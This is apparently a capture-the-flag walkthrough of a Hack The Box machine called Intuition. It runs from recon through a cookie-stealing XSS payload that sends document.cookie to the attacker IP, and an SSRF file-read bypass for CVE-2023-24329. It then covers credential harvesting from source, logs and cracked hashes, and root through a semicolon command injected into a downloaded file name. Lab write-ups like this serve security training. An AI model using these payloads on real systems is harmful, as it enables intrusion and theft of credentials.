TCP Scan

> TARGET=10.129.54.182 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://comprezzor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS

• add domain

echo '10.129.54.182    comprezzor.htb' >> /etc/hosts

web enum

wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://comprezzor.htb/" -H "Host: FUZZ.comprezzor.htb" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt

000000291:   302        5 L      22 W       199 Ch      "auth"
000000485:   200        108 L    299 W      3166 Ch     "report"
000000516:   302        5 L      22 W       251 Ch      "dashboard"

auth.comprezzor.htb    report.comprezzor.htb    dashboard.comprezzor.htb

report.comprezzor.htb

• browse to report.comprezzor.htb there is a report_bug functionality
• register an account and login to use the report bug functionality
• send a bug report with the following payload and setup a listener to check the returned call

# <img src=x onerror=fetch("http://10.10.14.121/?test2="+document.cookie)>
report_title=test&description=%3Cimg+src%3Dx+onerror%3Dfetch%28%22http%3A%2F%2F10.10.14.121%2F%3Ftest2%3D%22%2Bdocument.cookie%29%3E

10.129.54.182 - - [28/Apr/2024 18:42:32] "GET /test?user_data=eyJ1c2VyX2lkIjogMiwgInVzZXJuYW1lIjogImFkYW0iLCAicm9sZSI6ICJ3ZWJkZXYifXw1OGY2ZjcyNTMzOWNlM2Y2OWQ4NTUyYTEwNjk2ZGRlYmI2OGIyYjU3ZDJlNTIzYzA4YmRlODY4ZDNhNzU2ZGI4 HTTP/1.1"

• browse to dashboard.comprezzor.htb
• this is the cookie of the admin, base64 decode it

{"user_id": 2, "username": "adam", "role": "webdev"}|58f6f725339ce3f69d8552a10696ddebb68b2b57d2e523c08bde868d3a756db8

• browse to the submited ticket and set priority to high, then admin will read the ticket

eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhMjlkNzc2ZDU4OWQ5

• setup a listener to get the admin’s cookie and locate a link to http://dashboard.comprezzor.htb/create_pdf_report
• create a request and setup a listener, this request makes the target query a url and generate a pdf report

curl -H "cookie: user_data=cookie" http://dashboard.comprezzor.htb/create_pdf_report -d "report_url=http://10.10.14.121:8888/" -o-

found wkhtmltopdf 0.12.6 in the pdf report

• setting up a listener and check the headers, found Python-urllib/3.11, which is vulnerable to CVE-2023-24329
• checkout this post: https://vsociety.medium.com/cve-2023-24329-bypassing-url-blackslisting-using-blank-in-python-urllib-library-ee438679351d

python3 ../pserver.py 8888
INFO:root:Starting httpd...

INFO:root:GET request,
Path: /index.html
Headers:
Accept-Encoding: identity
Host: 10.10.14.121:8888
User-Agent: Python-urllib/3.11
Cookie: user_data=cookie
Connection: close

• so, simply inserting a space before a payload like file:///etc/passwd will bypass the check and achieve arbitrary file read

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-
data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List
Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting
System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network
Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd
Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-
timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin avahi:x:105:110:Avahi mDNS
daemon,,,:/run/avahi-daemon:/usr/sbin/nologin geoclue:x:106:111::/var/lib/geoclue:/usr/sbin/nologin

# file:///proc/self/cmdline
python3/app/code/app.py

# file:///app/code/app.py
from flask import Flask, request, redirect
from blueprints.index.index import main_bp
from blueprints.report.report import report_bp
from blueprints.auth.auth import auth_bp
from blueprints.dashboard.dashboard import dashboard_bp
app = Flask(__name__) app.secret_key = "7ASS7ADA8RF3FD7" app.config['SERVER_NAME'] = 'comprezzor.htb'
app.config['MAX_CONTENT_LENGTH'] = 5 * 1024 * 1024 # Limit file size to 5MB ALLOWED_EXTENSIONS = {'txt',
'pdf', 'docx'} # Add more allowed file extensions if needed app.register_blueprint(main_bp)
app.register_blueprint(report_bp, subdomain='report') app.register_blueprint(auth_bp, subdomain='auth')
app.register_blueprint(dashboard_bp, subdomain='dashboard') if __name__ == '__main__': app.run(debug=False,
host="0.0.0.0", port=80)

# file:///app/code/blueprints/dashboard/dashboard.py
ftp = FTP('ftp.local') ftp.login(user='ftp_admin', passwd='u3jai8y71s2') ftp.cwd('/')

# file:///app/code/blueprints/auth/auth_utils.py
there is a sqlite3 db called users.db

ftp.local

• use the same create_pdf_report url and connect to ftp

# ftp://ftp_admin:u3jai8y71s2@ftp.local
-rw------- 1 root root 2655 Apr 29 01:45 private-8297.key -rw-r--r-- 1 root root 15519 Apr 29 01:45 welcome_note.pdf -rw-
r--r-- 1 root root 1732 Apr 29 01:45 welcome_note.txt

# ftp://ftp_admin:u3jai8y71s2@ftp.local/private-8297.key
get the private key

# ftp://ftp_admin:u3jai8y71s2@ftp.local/welcome_note.txt
Dear Devs, We are thrilled to extend a warm welcome to you as you embark on this exciting journey with us. Your
arrival marks the beginning of an inspiring chapter in our collective pursuit of excellence, and we are genuinely
delighted to have you on board. Here, we value talent, innovation, and teamwork, and your presence here reaffirms our
commitment to nurturing a diverse and dynamic workforce. Your skills, experience, and unique perspectives are
invaluable assets that will contribute significantly to our continued growth and success. As you settle into your new
role, please know that you have our unwavering support. Our team is here to guide and assist you every step of the way,
ensuring that you have the resources and knowledge necessary to thrive in your position. To facilitate your work and
access to our systems, we have attached an SSH private key to this email. You can use the following passphrase to
access it, `Y27SH19HDIWD`. Please ensure the utmost confidentiality and security when using this key. If you have any
questions or require assistance with server access or any other aspect of your work, please do not hesitate to reach out
for assistance. In addition to your technical skills, we encourage you to bring your passion, creativity, and innovative
thinking to the table. Your contributions will play a vital role in shaping the future of our projects and products. Once
again, welcome to your new family. We look forward to getting to know you, collaborating with you, and witnessing
your exceptional contributions. Together, we will continue to achieve great things. If you have any questions or need
further information, please feel free to me at adam@comprezzor.htb. Best regards, Adam

• geneate the id_rsa file from the above private key

> ssh-keygen -p -N "" -m pem -f private-8297.key
Enter old passphrase:
Key has comment 'dev_acc@local'
Your identification has been saved with the new passphrase.

• access the target to get user flag

ssh -i private-8297.key dev_acc@comprezzor.htb
dev_acc@intuition:~$ ls
user.txt
dev_acc@intuition:~$ cat user.txt
13c44b4b6263a2fbc5ed139142834394
dev_acc@intuition:~$

pe

• search for the previously found users.db file

dev_acc@intuition:~$ find / -type f -name users.db 2>/dev/null
/var/www/app/blueprints/auth/users.db

• download to local and crack the hashes in it

sha256$nypGJ02XBnkIQK71$f0e11dc8ad21242b550cc8a3c27baaf1022b6522afaadbfa92bd612513e9b606
sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43

> hashcat.exe -m 30120 hash.txt rockyou.txt
sha256$Z7bcBO9P43gvdQWp$a67ea5f8722e69ee99258f208dc56a1d5d631f287106003595087cf42189fc43:adam gray

• login to ftp as adam

dev_acc@intuition:~$ ftp localhost
Connected to localhost.
220 pyftpdlib 1.5.7 ready.
Name (localhost:dev_acc): adam
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||39073|).
125 Data connection already open. Transfer starting.
drwxr-xr-x   3 root     1002         4096 Apr 10 08:21 backup
226 Transfer complete.
ftp> cd backup
250 "/backup" is the current directory.
ftp> ls
229 Entering extended passive mode (|||32967|).
150 File status okay. About to open data connection.
drwxr-xr-x   2 root     1002         4096 Apr 10 08:21 runner1
226 Transfer complete.
ftp> cd runner1
250 "/backup/runner1" is the current directory.
ftp> ls
229 Entering extended passive mode (|||39347|).
150 File status okay. About to open data connection.
-rwxr-xr-x   1 root     1002          318 Apr 06 00:25 run-tests.sh
-rwxr-xr-x   1 root     1002        16744 Oct 19  2023 runner1
-rw-r--r--   1 root     1002         3815 Oct 19  2023 runner1.c
226 Transfer complete.
ftp> get run-tests.sh
ftp> get runner1.c
ftp> get runner1

• files

#!/bin/bash

# List playbooks
./runner1 list

# Run playbooks [Need authentication]
# ./runner run [playbook number] -a [auth code]
#./runner1 run 1 -a "UHI75GHI****"

# Install roles [Need authentication]
# ./runner install [role url] -a [auth code]
#./runner1 install http://role.host.tld/role.tar -a "UHI75GHI****"

• from runner1.c:13,24

#define AUTH_KEY_HASH "0feda17076d793c2ef2870d7427ad4ed"
...
if (strcmp(md5_str, AUTH_KEY_HASH) == 0) {

• crack the hash

> hashcat.exe hash.txt -a 3 -m 0 -1 ?l?u?d?s UHI75GHI?1?1?1?1
0feda17076d793c2ef2870d7427ad4ed:UHI75GHINKOP

./runner1 install http://role.host.tld/role.tar -a "UHI75GHINKOP"

• local enum

2024/04/29 02:50:20 CMD: UID=0    PID=2013   | python3 /ftp/server.py
2024/04/29 02:50:20 CMD: UID=1200 PID=1916   | python3 -m websockify --web /opt/bin/noVNC 7900 localhost:5900
2024/04/29 04:00:01 CMD: UID=0    PID=88146  | /bin/sh /root/scripts/cleanup/cleanup.sh
2024/04/29 04:00:01 CMD: UID=0    PID=88148  | /usr/bin/cp -r /root/scripts/cleanup/ftp_admin/private-8297.key /root/scripts/cleanup/ftp_admin/welcome_note.pdf /root/scripts/cleanup/ftp_admin/welcome_note.txt /opt/ftp/ftp_admin/

[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:21            0.0.0.0:*               LISTEN      -
tcp        0      0 172.21.0.1:21           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4444          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33791         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -

Found lib_mysqludf_sys.so:
If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');

• in the admin dashboard, there is a feature for backup, create a backup and quickly login to ftp as ftp_admin then get the back up file before it’s deleted

ftp> ls
229 Entering extended passive mode (|||46617|).
125 Data connection already open. Transfer starting.
-rw-r--r--   1 root     root        53224 Apr 29 03:40 app_backup_20240429034044.zip
-rw-------   1 root     root         2655 Apr 29 03:40 private-8297.key
-rw-r--r--   1 root     root        15519 Apr 29 03:40 welcome_note.pdf
-rw-r--r--   1 root     root         1732 Apr 29 03:40 welcome_note.txt
226 Transfer complete.
ftp> get app_backup_20240429034044.zip
local: app_backup_20240429034044.zip remote: app_backup_20240429034044.zip

dev_acc@intuition:~$ find / -type f -user lopez 2>/dev/null
/etc/ansible/roles/kavi.tar/meta/main.yml
/usr/share/ansible/roles/kavi.tar/meta/main.yml

• check recently changed files

find / -type f -newermt '2024-04-01' -not -path "/usr/*" -not -path "/sys/*" -not -path "/proc/*" -not -path "/run/*" -not -path "/boot/*" -not -path "/var/lib/*" -ls 2>/dev/null

• check log files

dev_acc@intuition:~$ zgrep -i lopez /var/log/suricata/*.gz
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:36.099184+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:52.999165+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"PASS","command_data":"Lopezzz1992%123","completion_code":["530"],"reply":["Authentication failed."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:32.133372+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}}
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:48.188361+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"PASS","command_data":"Lopezz1992%123","completion_code":["230"],"reply":["Login successful."],"reply_received":"yes"}}

ftp_admin:u3jai8y71s2 lopez:Lopezz1992%123

• check sudo

lopez@intuition:~$ sudo -l
[sudo] password for lopez:
Matching Defaults entries for lopez on intuition:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User lopez may run the following commands on intuition:
    (ALL : ALL) /opt/runner2/runner2

• enum

/opt/playbooks/inventory.ini
[local]
127.0.0.1
127.0.0.1 ansible_ssh_user=root ansible_ssh_private_key_file=/root/keys/private.key

[docker_web_servers]
172.21.0.2

/opt/playbooks/apt_update.yml
---
- name: Update and Upgrade APT Packages test
  hosts: local
  become: yes
  tasks:
    - name: Update APT Cache
      apt:
        update_cache: yes
      when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'

    - name: Upgrade APT Packages
      apt:
        upgrade: dist
        update_cache: yes
      when: ansible_distribution == 'Debian' or ansible_distribution == 'Ubuntu'

• refer to https://github.com/coopdevs/sys-admins-role for an example tar.gz file
• create a json file

{"run":{"action":"install","role_file":"exploit.tar.gz;bash"},"auth_code":"UHI75GHINKOP"}

• get the tar.gz and the json

lopez@intuition:~$ wget http://10.10.14.121/exploit.json -O exploit.json && wget http://10.10.14.121/exploit.tar.gz -O 'exploit.tar.gz;bash' && sudo /opt/runner2/runner2 exploit.json
--2024-04-29 10:15:40--  http://10.10.14.121/exploit.json
Connecting to 10.10.14.121:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 89 [application/json]
Saving to: ‘exploit.json’

exploit.json                              100%[====================================================================================>]      89  --.-KB/s    in 0s

2024-04-29 10:15:40 (7.00 MB/s) - ‘exploit.json’ saved [89/89]

--2024-04-29 10:15:40--  http://10.10.14.121/exploit.tar.gz
Connecting to 10.10.14.121:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13787 (13K) [application/gzip]
Saving to: ‘exploit.tar.gz;bash’

exploit.tar.gz;bash                       100%[====================================================================================>]  13.46K  58.7KB/s    in 0.2s

2024-04-29 10:15:41 (58.7 KB/s) - ‘exploit.tar.gz;bash’ saved [13787/13787]

Starting galaxy role install process
- exploit.tar.gz is already installed, skipping.
root@intuition:/home/lopez# id
uid=0(root) gid=0(root) groups=0(root)
root@intuition:/home/lopez# cat /root/root.txt
3de0191f22527e88604dac5007d232a0

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack